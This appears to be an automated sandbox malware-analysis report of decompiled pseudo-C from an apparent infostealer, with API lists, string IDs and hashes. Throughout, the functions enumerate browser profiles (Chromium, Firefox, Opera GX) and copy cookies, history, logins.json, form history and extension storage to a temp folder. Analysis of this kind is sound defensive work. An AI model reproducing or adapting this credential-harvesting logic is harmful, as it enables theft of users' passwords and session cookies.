                                                                                						_t123 = GetFileAttributesA(_t149 - 0x748);
                                                                                						if(_t123 != 0xffffffff) {
                                                                                							_t168 = _t123 & 0x00000010;
                                                                                							if((_t123 & 0x00000010) == 0) {
                                                                                								_t151 = _t151 - 0x1c;
                                                                                								_t148 = _t151;
                                                                                								 *((intOrPtr*)(_t149 - 0x9a4)) = _t151;
                                                                                								E0040410F(_t151, _t149 + 0x1c);
                                                                                								_push( *((intOrPtr*)(_t149 + 0x18)));
                                                                                								_push(_t149 - 0x118);
                                                                                								_push( *((intOrPtr*)(_t149 - 0x994)));
                                                                                								_push( *((intOrPtr*)(_t149 - 0x9a0)));
                                                                                								_push( *((intOrPtr*)(_t149 - 0x99c)));
                                                                                								E00412AE1(_t140, _t149 - 0x430, _t146, _t151, _t168);
                                                                                							}
                                                                                						}
                                                                                						_t125 = GetFileAttributesA(_t149 - 0x850);
                                                                                						if(_t125 != 0xffffffff) {
                                                                                							_t170 = _t125 & 0x00000010;
                                                                                							if((_t125 & 0x00000010) == 0) {
                                                                                								_t151 = _t151 - 0x1c;
                                                                                								_t148 = _t151;
                                                                                								 *((intOrPtr*)(_t149 - 0x9a4)) = _t151;
                                                                                								E0040410F(_t151, _t149 + 0x1c);
                                                                                								_push( *((intOrPtr*)(_t149 + 0x18)));
                                                                                								_push(_t149 - 0x118);
                                                                                								_push( *((intOrPtr*)(_t149 - 0x994)));
                                                                                								_push( *((intOrPtr*)(_t149 - 0x9a0)));
                                                                                								_push( *((intOrPtr*)(_t149 - 0x99c)));
                                                                                								E00412AE1(_t140, _t149 - 0x328, _t146, _t151, _t170);
                                                                                							}
                                                                                						}
                                                                                						goto L21;
                                                                                					}
                                                                                					_t138 = _t98 - 1;
                                                                                					if(_t138 == 0) {
                                                                                						_push("Opera Stable");
                                                                                						goto L11;
                                                                                					}
                                                                                					if(_t138 != 1) {
                                                                                						goto L12;
                                                                                					} else {
                                                                                						_push("Opera GX Stable");
                                                                                						goto L11;
                                                                                					}
                                                                                					L21:
                                                                                					if(FindNextFileA( *(_t149 - 0x9a8), _t149 - 0x990) != 0) {
                                                                                						_t148 =  *((intOrPtr*)(_t149 - 0x9ac));
                                                                                						L3:
                                                                                						_push(".");
                                                                                						_push(_t149 - 0x964);
                                                                                						if( *0x44a1d8() == 0) {
                                                                                							goto L21;
                                                                                						}
                                                                                						goto L4;
                                                                                					}
                                                                                					FindClose( *(_t149 - 0x9a8));
                                                                                					goto L23;
                                                                                				}
                                                                                			}













                                                                                0x00412d6e
                                                                                0x00412d6e
                                                                                0x00412d6e
                                                                                0x00412d78
                                                                                0x00412d80
                                                                                0x00412d89
                                                                                0x00412d92
                                                                                0x00412d9b
                                                                                0x00412d9d
                                                                                0x00412da3
                                                                                0x00412da9
                                                                                0x00412dba
                                                                                0x00412dc0
                                                                                0x00412dd1
                                                                                0x00412dd7
                                                                                0x00412de0
                                                                                0x00413032
                                                                                0x00413039
                                                                                0x00413043
                                                                                0x00412de6
                                                                                0x00412de6
                                                                                0x00412dec
                                                                                0x00412df1
                                                                                0x00412e13
                                                                                0x00412e13
                                                                                0x00412e1e
                                                                                0x00412e27
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00412e3b
                                                                                0x00412e43
                                                                                0x00412e46
                                                                                0x00412e49
                                                                                0x00412e65
                                                                                0x00412e66
                                                                                0x00412e6d
                                                                                0x00412e73
                                                                                0x00412e8d
                                                                                0x00412ea5
                                                                                0x00412ec8
                                                                                0x00412ee0
                                                                                0x00412f03
                                                                                0x00412f1b
                                                                                0x00412f21
                                                                                0x00412f2b
                                                                                0x00412f30
                                                                                0x00412f32
                                                                                0x00412f34
                                                                                0x00412f36
                                                                                0x00412f3c
                                                                                0x00412f3e
                                                                                0x00412f45
                                                                                0x00412f4a
                                                                                0x00412f53
                                                                                0x00412f54
                                                                                0x00412f60
                                                                                0x00412f66
                                                                                0x00412f6c
                                                                                0x00412f6c
                                                                                0x00412f34
                                                                                0x00412f78
                                                                                0x00412f7d
                                                                                0x00412f7f
                                                                                0x00412f81
                                                                                0x00412f83
                                                                                0x00412f89
                                                                                0x00412f8b
                                                                                0x00412f92
                                                                                0x00412f97
                                                                                0x00412fa0
                                                                                0x00412fa1
                                                                                0x00412fad
                                                                                0x00412fb3
                                                                                0x00412fb9
                                                                                0x00412fb9
                                                                                0x00412f81
                                                                                0x00412fc5
                                                                                0x00412fca
                                                                                0x00412fcc
                                                                                0x00412fce
                                                                                0x00412fd0
                                                                                0x00412fd6
                                                                                0x00412fd8
                                                                                0x00412fdf
                                                                                0x00412fe4
                                                                                0x00412fed
                                                                                0x00412fee
                                                                                0x00412ffa
                                                                                0x00413000
                                                                                0x00413006
                                                                                0x00413006
                                                                                0x00412fce
                                                                                0x00000000
                                                                                0x00412fca
                                                                                0x00412e4b
                                                                                0x00412e4c
                                                                                0x00412e58
                                                                                0x00000000
                                                                                0x00412e58
                                                                                0x00412e4f
                                                                                0x00000000
                                                                                0x00412e51
                                                                                0x00412e51
                                                                                0x00000000
                                                                                0x00412e51
                                                                                0x0041300b
                                                                                0x00413020
                                                                                0x00412df3
                                                                                0x00412df9
                                                                                0x00412df9
                                                                                0x00412e04
                                                                                0x00412e0d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00412e0d
                                                                                0x0041302c
                                                                                0x00000000
                                                                                0x0041302c

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$File$AttributesFind$CloseFirstH_prolog3_Next_memsetlstrcat
                                                                                • String ID: %s\%s\IndexedDB\chrome-extension_%s_0.indexeddb.leveldb$%s\%s\Local Extension Settings\%s$%s\%s\Sync Extension Settings\%s$%s\*.*$%s\CURRENT$Opera GX Stable$Opera Stable
                                                                                • API String ID: 2911694193-808128889
                                                                                • Opcode ID: ede5c212e9ac8c96bc32fce2e1603e1b3109dd430702a8e7830b8368be6b36d6
                                                                                • Instruction ID: 3091ba9dfd4d52703471345fbe3d32bcf531f4ab9223dbd2c7e7a5c4e3652c12
                                                                                • Opcode Fuzzy Hash: ede5c212e9ac8c96bc32fce2e1603e1b3109dd430702a8e7830b8368be6b36d6
                                                                                • Instruction Fuzzy Hash: B3712BB190122CAFDF20AF64DD45EDA7778AF05304F4400E6FA08E2151D6799BE5CF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 50%
                                                                                			E00410EAE(intOrPtr __ecx, char* __edx, char* _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                				signed int _v12;
                                                                                				char _v280;
                                                                                				char _v544;
                                                                                				char _v808;
                                                                                				struct _WIN32_FIND_DATAA _v1128;
                                                                                				intOrPtr _v1132;
                                                                                				char* _v1136;
                                                                                				void* _v1140;
                                                                                				intOrPtr _v1144;
                                                                                				intOrPtr _v1148;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t58;
                                                                                				intOrPtr _t61;
                                                                                				int _t66;
                                                                                				void* _t83;
                                                                                				signed int _t85;
                                                                                				signed char _t87;
                                                                                				signed int _t89;
                                                                                				signed int _t91;
                                                                                				intOrPtr _t95;
                                                                                				intOrPtr _t98;
                                                                                				intOrPtr _t103;
                                                                                				char* _t104;
                                                                                				CHAR* _t116;
                                                                                				intOrPtr _t120;
                                                                                				char* _t121;
                                                                                				signed int _t122;
                                                                                				void* _t123;
                                                                                				void* _t124;
                                                                                
                                                                                				_t118 = __edx;
                                                                                				_t58 =  *0x447674; // 0x4124c941
                                                                                				_v12 = _t58 ^ _t122;
                                                                                				_t103 = _a20;
                                                                                				_t121 = _a12;
                                                                                				_t120 = _a16;
                                                                                				_v1136 = _a4;
                                                                                				_t61 = _a8;
                                                                                				_v1144 = _t61;
                                                                                				_v1132 = __ecx;
                                                                                				_v1148 = _t103;
                                                                                				wsprintfA( &_v808, "%s\\*", _t61);
                                                                                				_t124 = _t123 + 0xc;
                                                                                				_t66 = FindFirstFileA( &_v808,  &_v1128);
                                                                                				_v1140 = _t66;
                                                                                				if(_t66 == 0xffffffff) {
                                                                                					L22:
                                                                                					return E0041DEB4(_t66, _t103, _v12 ^ _t122, _t118, _t120, _t121);
                                                                                				} else {
                                                                                					goto L1;
                                                                                				}
                                                                                				do {
                                                                                					L1:
                                                                                					_push(".");
                                                                                					_push( &(_v1128.cFileName));
                                                                                					if( *0x44a1d8() == 0) {
                                                                                						goto L20;
                                                                                					}
                                                                                					_push("..");
                                                                                					_push( &(_v1128.cFileName));
                                                                                					if( *0x44a1d8() == 0) {
                                                                                						goto L20;
                                                                                					}
                                                                                					wsprintfA( &_v280, "%s\\%s", _v1144,  &(_v1128.cFileName));
                                                                                					E00427E30( &_v544, 0, 0x104);
                                                                                					wsprintfA( &_v544, "%s\\%s\\%s\\%s", _v1144,  &(_v1128.cFileName), "Network", "Cookies");
                                                                                					_t124 = _t124 + 0x34;
                                                                                					_t83 =  *0x44a1d8( &(_v1128.cFileName),  *0x449ce8);
                                                                                					_t129 = _t83;
                                                                                					if(_t83 != 0) {
                                                                                						_t85 =  *0x44a1d8( &(_v1128.cFileName),  *0x449b6c);
                                                                                						__eflags = _t85;
                                                                                						if(_t85 != 0) {
                                                                                							_t87 = GetFileAttributesA( &_v544);
                                                                                							__eflags = _t87 - 0xffffffff;
                                                                                							if(_t87 == 0xffffffff) {
                                                                                								L12:
                                                                                								_t89 =  *0x44a1d8( &(_v1128.cFileName), "History");
                                                                                								__eflags = _t89;
                                                                                								if(_t89 != 0) {
                                                                                									_t91 =  *0x44a1d8( &(_v1128.cFileName),  *0x449bc8);
                                                                                									__eflags = _t91;
                                                                                									if(_t91 != 0) {
                                                                                										__eflags = _v1128.dwFileAttributes & 0x00000010;
                                                                                										if((_v1128.dwFileAttributes & 0x00000010) == 0) {
                                                                                											goto L20;
                                                                                										}
                                                                                										goto L19;
                                                                                									}
                                                                                									_t95 = _v1132;
                                                                                									__eflags =  *((char*)(_t95 + 1));
                                                                                									if( *((char*)(_t95 + 1)) != 0) {
                                                                                										E00410130( &_v280, _v1136, _t121, _t120, _t103);
                                                                                										_t118 = _v1136;
                                                                                										_t124 = _t124 + 0xc;
                                                                                										_push(_t121);
                                                                                										E00410396( &_v280, _v1136);
                                                                                									}
                                                                                									goto L19;
                                                                                								}
                                                                                								_t98 = _v1132;
                                                                                								__eflags =  *((char*)(_t98 + 2));
                                                                                								if( *((char*)(_t98 + 2)) != 0) {
                                                                                									_t104 = _v1136;
                                                                                									_push(_t121);
                                                                                									E004104F2(_t104,  &_v280, _t118);
                                                                                									_push(_t121);
                                                                                									_t118 = _t104;
                                                                                									E00410639( &_v280, _t104);
                                                                                									_t103 = _v1148;
                                                                                								}
                                                                                								goto L19;
                                                                                							}
                                                                                							__eflags = _t87 & 0x00000010;
                                                                                							if((_t87 & 0x00000010) != 0) {
                                                                                								goto L12;
                                                                                							}
                                                                                							_t118 =  &(_v1128.cFileName);
                                                                                							_t116 =  &_v544;
                                                                                							L8:
                                                                                							E0040FDEC(_t116, _t118, _t121, _t120, _t103);
                                                                                							goto L5;
                                                                                						}
                                                                                						_t118 = _v1136;
                                                                                						_t116 =  &_v280;
                                                                                						goto L8;
                                                                                					} else {
                                                                                						_push(_t103);
                                                                                						_push(_t120);
                                                                                						_push(_t121);
                                                                                						E0040FA8E(_t103,  &_v280, _t120, _t121, _t129);
                                                                                						L5:
                                                                                						_t124 = _t124 + 0xc;
                                                                                						L19:
                                                                                						E00410EAE(_v1132, _t118,  &(_v1128.cFileName),  &_v280, _t121, _t120, _t103);
                                                                                					}
                                                                                					L20:
                                                                                				} while (FindNextFileA(_v1140,  &_v1128) != 0);
                                                                                				_t66 = FindClose(_v1140);
                                                                                				goto L22;
                                                                                			}



































                                                                                0x00410eae
                                                                                0x00410eb7
                                                                                0x00410ebe
                                                                                0x00410ec5
                                                                                0x00410ec9
                                                                                0x00410ecd
                                                                                0x00410ed0
                                                                                0x00410ed6
                                                                                0x00410eda
                                                                                0x00410eec
                                                                                0x00410ef2
                                                                                0x00410ef8
                                                                                0x00410efe
                                                                                0x00410f0f
                                                                                0x00410f15
                                                                                0x00410f1e
                                                                                0x00411122
                                                                                0x00411130
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00410f24
                                                                                0x00410f24
                                                                                0x00410f24
                                                                                0x00410f2f
                                                                                0x00410f38
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00410f3e
                                                                                0x00410f49
                                                                                0x00410f52
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00410f71
                                                                                0x00410f85
                                                                                0x00410fb0
                                                                                0x00410fb6
                                                                                0x00410fc6
                                                                                0x00410fcc
                                                                                0x00410fce
                                                                                0x00410ff3
                                                                                0x00410ff9
                                                                                0x00410ffb
                                                                                0x0041101a
                                                                                0x00411020
                                                                                0x00411023
                                                                                0x00411037
                                                                                0x00411043
                                                                                0x00411049
                                                                                0x0041104b
                                                                                0x00411094
                                                                                0x0041109a
                                                                                0x0041109c
                                                                                0x004110d6
                                                                                0x004110dd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004110dd
                                                                                0x0041109e
                                                                                0x004110a4
                                                                                0x004110a8
                                                                                0x004110b9
                                                                                0x004110be
                                                                                0x004110c4
                                                                                0x004110c7
                                                                                0x004110ce
                                                                                0x004110d3
                                                                                0x00000000
                                                                                0x004110a8
                                                                                0x0041104d
                                                                                0x00411053
                                                                                0x00411057
                                                                                0x0041105d
                                                                                0x00411063
                                                                                0x0041106a
                                                                                0x00411070
                                                                                0x00411071
                                                                                0x00411079
                                                                                0x0041107e
                                                                                0x00411084
                                                                                0x00000000
                                                                                0x00411057
                                                                                0x00411025
                                                                                0x00411027
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00411029
                                                                                0x0041102f
                                                                                0x00411009
                                                                                0x0041100c
                                                                                0x00000000
                                                                                0x0041100c
                                                                                0x00410ffd
                                                                                0x00411003
                                                                                0x00000000
                                                                                0x00410fd0
                                                                                0x00410fd0
                                                                                0x00410fd1
                                                                                0x00410fd2
                                                                                0x00410fd9
                                                                                0x00410fde
                                                                                0x00410fde
                                                                                0x004110df
                                                                                0x004110f6
                                                                                0x004110f6
                                                                                0x004110fb
                                                                                0x0041110e
                                                                                0x0041111c
                                                                                0x00000000

                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 00410EF8
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00410F0F
                                                                                • StrCmpCA.SHLWAPI(?,00440CA4), ref: 00410F30
                                                                                • StrCmpCA.SHLWAPI(?,00440CA8), ref: 00410F4A
                                                                                • wsprintfA.USER32 ref: 00410F71
                                                                                • _memset.LIBCMT ref: 00410F85
                                                                                • wsprintfA.USER32 ref: 00410FB0
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00410FC6
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00410FF3
                                                                                  • Part of subcall function 0040FA8E: __EH_prolog3_GS.LIBCMT ref: 0040FA98
                                                                                  • Part of subcall function 0040FA8E: GetCurrentDirectoryA.KERNEL32(00000104,?,00000180,00410FDE,?,?,?), ref: 0040FAC6
                                                                                  • Part of subcall function 0040FA8E: lstrcat.KERNEL32(?,\temp), ref: 0040FAD8
                                                                                  • Part of subcall function 0040FA8E: CopyFileA.KERNEL32 ref: 0040FAE8
                                                                                  • Part of subcall function 0040FA8E: StrCmpCA.SHLWAPI(?,0043E028), ref: 0040FBEE
                                                                                  • Part of subcall function 0040FA8E: StrCmpCA.SHLWAPI(?,0043E028), ref: 0040FC03
                                                                                • GetFileAttributesA.KERNEL32(?), ref: 0041101A
                                                                                • StrCmpCA.SHLWAPI(?,History), ref: 00411043
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00411094
                                                                                • FindNextFileA.KERNEL32(?,?), ref: 00411108
                                                                                • FindClose.KERNEL32(?), ref: 0041111C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Findwsprintf$AttributesCloseCopyCurrentDirectoryFirstH_prolog3_Next_memsetlstrcat
                                                                                • String ID: %s\%s$%s\%s\%s\%s$%s\*$Cookies$History$Network
                                                                                • API String ID: 2822449826-2179649295
                                                                                • Opcode ID: 1237bb0c27e4283f7b72283bfadd07c7e3b69771b6c6cf49debf117e223b815b
                                                                                • Instruction ID: d91424bcce5c9974c5de546805ec42939d57a20607f808674c0f35252fd55063
                                                                                • Opcode Fuzzy Hash: 1237bb0c27e4283f7b72283bfadd07c7e3b69771b6c6cf49debf117e223b815b
                                                                                • Instruction Fuzzy Hash: 3D615FB190021C9BDB24DF64DC89FDAB77CAB09304F4040EAA609A3161EB759ED5CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 20%
                                                                                			E00411133(void* __ecx, CHAR* _a4, char _a8, char _a12) {
                                                                                				signed int _v12;
                                                                                				char _v280;
                                                                                				char _v544;
                                                                                				struct _WIN32_FIND_DATAA _v864;
                                                                                				CHAR* _v868;
                                                                                				void* _v872;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t33;
                                                                                				CHAR* _t35;
                                                                                				int _t40;
                                                                                				void* _t58;
                                                                                				CHAR* _t66;
                                                                                				void* _t77;
                                                                                				intOrPtr _t78;
                                                                                				signed int _t79;
                                                                                				void* _t80;
                                                                                				void* _t81;
                                                                                
                                                                                				_t33 =  *0x447674; // 0x4124c941
                                                                                				_v12 = _t33 ^ _t79;
                                                                                				_t2 =  &_a8; // 0x43e028
                                                                                				_t35 =  *_t2;
                                                                                				_t66 = _a4;
                                                                                				_t4 =  &_a12; // 0x413e28
                                                                                				_t78 =  *_t4;
                                                                                				_v868 = _t35;
                                                                                				_t77 = __ecx;
                                                                                				wsprintfA( &_v544, "%s\\*", _t35);
                                                                                				_t81 = _t80 + 0xc;
                                                                                				_t40 = FindFirstFileA( &_v544,  &_v864);
                                                                                				_v872 = _t40;
                                                                                				if(_t40 != 0xffffffff) {
                                                                                					do {
                                                                                						_push(".");
                                                                                						_push( &(_v864.cFileName));
                                                                                						if( *0x44a1d8() != 0) {
                                                                                							_push("..");
                                                                                							_push( &(_v864.cFileName));
                                                                                							if( *0x44a1d8() != 0) {
                                                                                								wsprintfA( &_v280, "%s\\%s", _v868,  &(_v864.cFileName));
                                                                                								_t81 = _t81 + 0x10;
                                                                                								_push("cookies.sqlite");
                                                                                								_push( &(_v864.cFileName));
                                                                                								if( *0x44a1d8() != 0) {
                                                                                									_push("formhistory.sqlite");
                                                                                									_push( &(_v864.cFileName));
                                                                                									if( *0x44a1d8() != 0) {
                                                                                										_push("logins.json");
                                                                                										_push( &(_v864.cFileName));
                                                                                										if( *0x44a1d8() != 0) {
                                                                                											_t58 =  *0x44a1d8( &(_v864.cFileName), "places.sqlite");
                                                                                											if(_t58 != 0) {
                                                                                												if((_v864.dwFileAttributes & 0x00000010) != 0) {
                                                                                													goto L14;
                                                                                												}
                                                                                											} else {
                                                                                												if( *((intOrPtr*)(_t77 + 2)) != _t58) {
                                                                                													_push(_t78);
                                                                                													E00410C17(_t66,  &_v280, _t76);
                                                                                													goto L5;
                                                                                												}
                                                                                												goto L14;
                                                                                											}
                                                                                										} else {
                                                                                											_push(_t78);
                                                                                											E0041078A(_v868, _t76);
                                                                                											goto L5;
                                                                                										}
                                                                                									} else {
                                                                                										_push(_t78);
                                                                                										_t76 = _t66;
                                                                                										E00410D54( &_v280, _t66);
                                                                                										goto L5;
                                                                                									}
                                                                                								} else {
                                                                                									_push(_t78);
                                                                                									_t76 = _t66;
                                                                                									E004109F6( &_v280, _t66);
                                                                                									L5:
                                                                                									L14:
                                                                                									E00411133(_t77,  &(_v864.cFileName),  &_v280, _t78);
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					} while (FindNextFileA(_v872,  &_v864) != 0);
                                                                                					_t40 = FindClose(_v872);
                                                                                				}
                                                                                				return E0041DEB4(_t40, _t66, _v12 ^ _t79, _t76, _t77, _t78);
                                                                                			}






















                                                                                0x0041113c
                                                                                0x00411143
                                                                                0x00411146
                                                                                0x00411146
                                                                                0x0041114a
                                                                                0x0041114e
                                                                                0x0041114e
                                                                                0x00411153
                                                                                0x00411165
                                                                                0x00411167
                                                                                0x0041116d
                                                                                0x0041117e
                                                                                0x00411184
                                                                                0x0041118d
                                                                                0x00411193
                                                                                0x00411193
                                                                                0x0041119e
                                                                                0x004111a7
                                                                                0x004111ad
                                                                                0x004111b8
                                                                                0x004111c1
                                                                                0x004111e0
                                                                                0x004111e6
                                                                                0x004111e9
                                                                                0x004111f4
                                                                                0x004111fd
                                                                                0x00411210
                                                                                0x0041121b
                                                                                0x00411224
                                                                                0x00411236
                                                                                0x00411241
                                                                                0x0041124a
                                                                                0x00411266
                                                                                0x0041126e
                                                                                0x0041128a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00411270
                                                                                0x00411273
                                                                                0x00411275
                                                                                0x0041127c
                                                                                0x00000000
                                                                                0x0041127c
                                                                                0x00000000
                                                                                0x00411273
                                                                                0x0041124c
                                                                                0x00411252
                                                                                0x00411253
                                                                                0x00000000
                                                                                0x00411253
                                                                                0x00411226
                                                                                0x00411226
                                                                                0x00411227
                                                                                0x0041122f
                                                                                0x00000000
                                                                                0x0041122f
                                                                                0x004111ff
                                                                                0x004111ff
                                                                                0x00411200
                                                                                0x00411208
                                                                                0x0041120d
                                                                                0x0041128c
                                                                                0x0041129d
                                                                                0x0041129d
                                                                                0x004111fd
                                                                                0x004111c1
                                                                                0x004112b5
                                                                                0x004112c3
                                                                                0x004112c3
                                                                                0x004112d7

                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 00411167
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 0041117E
                                                                                • StrCmpCA.SHLWAPI(?,00440CA4), ref: 0041119F
                                                                                • StrCmpCA.SHLWAPI(?,00440CA8), ref: 004111B9
                                                                                • wsprintfA.USER32 ref: 004111E0
                                                                                • StrCmpCA.SHLWAPI(?,cookies.sqlite), ref: 004111F5
                                                                                • StrCmpCA.SHLWAPI(?,formhistory.sqlite), ref: 0041121C
                                                                                  • Part of subcall function 004109F6: GetCurrentDirectoryA.KERNEL32(00000104,?,?,(>A(C,?), ref: 00410A2E
                                                                                  • Part of subcall function 004109F6: lstrcat.KERNEL32(?,\temp), ref: 00410A40
                                                                                  • Part of subcall function 004109F6: CopyFileA.KERNEL32 ref: 00410A50
                                                                                  • Part of subcall function 004109F6: _memset.LIBCMT ref: 00410A5D
                                                                                  • Part of subcall function 004109F6: wsprintfA.USER32 ref: 00410A6F
                                                                                • StrCmpCA.SHLWAPI(?,logins.json), ref: 00411242
                                                                                • StrCmpCA.SHLWAPI(?,places.sqlite), ref: 00411266
                                                                                • FindNextFileA.KERNEL32(?,?), ref: 004112AF
                                                                                • FindClose.KERNEL32(?), ref: 004112C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindwsprintf$CloseCopyCurrentDirectoryFirstNext_memsetlstrcat
                                                                                • String ID: %s\%s$%s\*$(>A(C$(C$cookies.sqlite$formhistory.sqlite$logins.json$places.sqlite
                                                                                • API String ID: 1611843655-513356000
                                                                                • Opcode ID: 526c7f9c89961249f420c482e6d79a38d8f49b15045f6f76ba119eaccf9901a8
                                                                                • Instruction ID: 49932d78ffe5ae1d6c696c91741bb45e5ad2906601964bfe3083489789689966
                                                                                • Opcode Fuzzy Hash: 526c7f9c89961249f420c482e6d79a38d8f49b15045f6f76ba119eaccf9901a8
                                                                                • Instruction Fuzzy Hash: 1B418E35940218ABDB25EF60DC85FEA77BCAB05300F0441EBB609E2160EB389BD5CF59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E00411E67(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t64;
                                                                                				void* _t70;
                                                                                				void* _t84;
                                                                                				CHAR* _t86;
                                                                                				int _t89;
                                                                                				void* _t94;
                                                                                				CHAR* _t96;
                                                                                				void* _t101;
                                                                                				CHAR* _t103;
                                                                                				CHAR* _t126;
                                                                                				void* _t127;
                                                                                				void* _t128;
                                                                                				void* _t130;
                                                                                				void* _t131;
                                                                                				void* _t132;
                                                                                				void* _t133;
                                                                                
                                                                                				_t133 = __eflags;
                                                                                				_push(0x4e0);
                                                                                				E004219DE(E004366DD, __ebx, __edi, __esi);
                                                                                				_push( *0x449bb4);
                                                                                				_t126 =  *((intOrPtr*)(_t127 + 0xc));
                                                                                				 *((intOrPtr*)(_t127 - 0x4e8)) = __ecx;
                                                                                				_t123 = __ecx + 8;
                                                                                				 *((intOrPtr*)(_t127 - 0x4dc)) =  *((intOrPtr*)(_t127 + 8));
                                                                                				_push(_t127 - 0x360);
                                                                                				 *((intOrPtr*)(_t127 - 0x4ec)) = _t126;
                                                                                				 *(_t127 - 0x4e4) =  *(_t127 + 0x10);
                                                                                				E0040D337(__ebx, __ecx + 8, _t126, _t133);
                                                                                				 *((intOrPtr*)(_t127 - 4)) = 0;
                                                                                				_push( *0x449ea8);
                                                                                				_t64 = E0041F644(0, _t123, _t126, _t133);
                                                                                				_t114 = _t127 - 0x344;
                                                                                				 *((intOrPtr*)(_t127 - 0x330)) = 0xf;
                                                                                				 *((intOrPtr*)(_t127 - 0x334)) = 0;
                                                                                				 *((char*)(_t127 - 0x344)) = 0;
                                                                                				E0040381A(_t127 - 0x344, _t64);
                                                                                				 *((char*)(_t127 - 4)) = 1;
                                                                                				wsprintfA(_t127 - 0x328, "%s\\*", _t126);
                                                                                				_t130 = _t128 + 0x18;
                                                                                				_t70 = FindFirstFileA(_t127 - 0x328, _t127 - 0x4d8);
                                                                                				 *(_t127 - 0x4e0) = _t70;
                                                                                				if(_t70 == 0xffffffff) {
                                                                                					L16:
                                                                                					E00402C34(_t127 - 0x344, 1, 0);
                                                                                					E00402C34(_t127 - 0x360, 1, 0);
                                                                                					return E00421A61(0, _t123, _t126);
                                                                                				}
                                                                                				_t126 = "\\";
                                                                                				do {
                                                                                					_push(".");
                                                                                					_push(_t127 - 0x4ac);
                                                                                					if( *0x44a1d8() != 0) {
                                                                                						_push("..");
                                                                                						_push(_t127 - 0x4ac);
                                                                                						if( *0x44a1d8() != 0) {
                                                                                							_t123 = "%s\\%s";
                                                                                							wsprintfA(_t127 - 0x220, _t123,  *((intOrPtr*)(_t127 - 0x4ec)), _t127 - 0x4ac);
                                                                                							_t131 = _t130 + 0x10;
                                                                                							_t84 =  *0x44a1d8( *((intOrPtr*)(_t127 - 0x4dc)), 0x43e028);
                                                                                							_push(_t127 - 0x4ac);
                                                                                							_t86 = _t127 - 0x118;
                                                                                							if(_t84 != 0) {
                                                                                								wsprintfA(_t86, _t123,  *((intOrPtr*)(_t127 - 0x4dc)));
                                                                                								_t130 = _t131 + 0x10;
                                                                                							} else {
                                                                                								wsprintfA(_t86, "%s");
                                                                                								_t130 = _t131 + 0xc;
                                                                                							}
                                                                                							_t89 = PathMatchSpecA(_t127 - 0x4ac,  *(_t127 - 0x4e4));
                                                                                							_t138 = _t89;
                                                                                							if(_t89 != 0) {
                                                                                								_push(_t126);
                                                                                								_push(_t127 - 0x37c);
                                                                                								_t94 = E0040D337(0, _t127 - 0x360, _t126, _t138);
                                                                                								 *((char*)(_t127 - 4)) = 2;
                                                                                								_t96 = E0040D3C3(_t114, _t127 - 0x398, _t94,  *((intOrPtr*)(_t127 - 0x4dc)));
                                                                                								_t132 = _t130 + 0x14;
                                                                                								_t139 = _t96[0x14] - 0x10;
                                                                                								if(_t96[0x14] >= 0x10) {
                                                                                									_t96 =  *_t96;
                                                                                								}
                                                                                								CreateDirectoryA(_t96, 0);
                                                                                								E00402C34(_t127 - 0x398, 1, 0);
